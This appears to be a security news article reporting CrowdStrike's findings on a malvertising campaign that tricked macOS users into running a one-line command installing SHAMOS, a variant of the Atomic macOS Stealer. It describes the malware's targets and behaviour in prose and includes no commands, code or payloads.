CrowdStrike warns of a spike in attacks aimed at infecting macOS users with a variant of the infamous Atomic macOS Stealer (AMOS) information stealer.
Between June and August, the cybercrime group Cookie Spider, which operates the AMOS malware-as-a-service (MaaS) enterprise, used malvertising to direct victims to fraudulent help websites and trick them into installing the malware.
The campaign, CrowdStrike says, targeted users who were searching for solutions to common macOS issues, and relied on promoting fraudulent advertisements for websites where victims were instructed to execute a malicious command on their systems.
The command would fetch a Bash script from a remote server, to capture the victim’s password and download an executable from another remote location.
Dubbed SHAMOS, the payload is a variant of AMOS that contains anti-VM checks to prevent execution in a sandboxed environment, and which can perform reconnaissance and data collection tasks.
The malware searches the system for files that contain credentials, data from Keychain, AppleNotes, browsers, and known cryptocurrency wallets, and attempts to exfiltrate them to a remote server, packed in a ZIP archive.
Additionally, SHAMOS can download and execute payloads, including a botnet module and a fake Ledger Live wallet application.
The malvertising campaign targeted users in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but was not served to Russian users.
CrowdStrike’s investigation revealed that the cybercriminals likely impersonated a legitimate Australia-based electronics store in their Google Advertising profile.
“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices,” CrowdStrike notes.
Related: Homebrew macOS Users Targeted With Information Stealer Malware
Related: High-Value NPM Developers Compromised in New Phishing Campaign
Related: North Korean Hackers Target macOS Users
Related: Digium Phones Targeted in Cybercrime Campaign Aimed at VoIP Systems
